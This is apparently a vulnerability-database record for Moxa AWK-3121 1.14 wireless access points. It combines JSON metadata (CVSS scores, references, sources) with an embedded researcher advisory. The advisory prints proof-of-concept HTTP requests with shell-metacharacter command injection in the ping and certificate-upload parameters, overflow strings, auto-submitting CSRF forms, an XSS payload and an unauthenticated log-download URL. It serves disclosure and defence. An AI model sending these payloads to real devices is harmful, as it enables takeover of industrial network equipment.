"db": "JVNDB",
"id": "JVNDB-2018-015591",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-326",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120483",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10698",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120483"
},
{
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
]
},
"id": "VAR-201906-0788",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120483"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.711000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-311",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120483"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "NVD",
"id": "CVE-2018-10698"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10698"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/311.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120483"
},
{
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120483"
},
{
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120483"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.590000",
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-120483"
},
{
"date": "2023-02-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"date": "2023-02-28T19:29:46.723000",
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Vulnerabilities related to certificate and password management in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
],
"trust": 0.6
}
}
VAR-201906-0780
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. An information disclosure vulnerability exists in Moxa's AWK-31211.14 release.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization.
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection.
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters.
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0780",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 2.4,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "NVD",
"id": "CVE-2018-10690"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10690"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10690",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10690",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-23548",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120475",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10690",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10690",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-23548",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-318",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120475",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10690",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23548"
},
{
"db": "VULHUB",
"id": "VHN-120475"
},
{
"db": "VULMON",
"id": "CVE-2018-10690"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015585"
},
{
"db": "NVD",
"id": "CVE-2018-10690"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-318"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. An information disclosure vulnerability exists in Moxa\u0027s AWK-31211.14 release. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). However, the same functionality allows an attacker to download\n the file without any authentication or authorization. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- 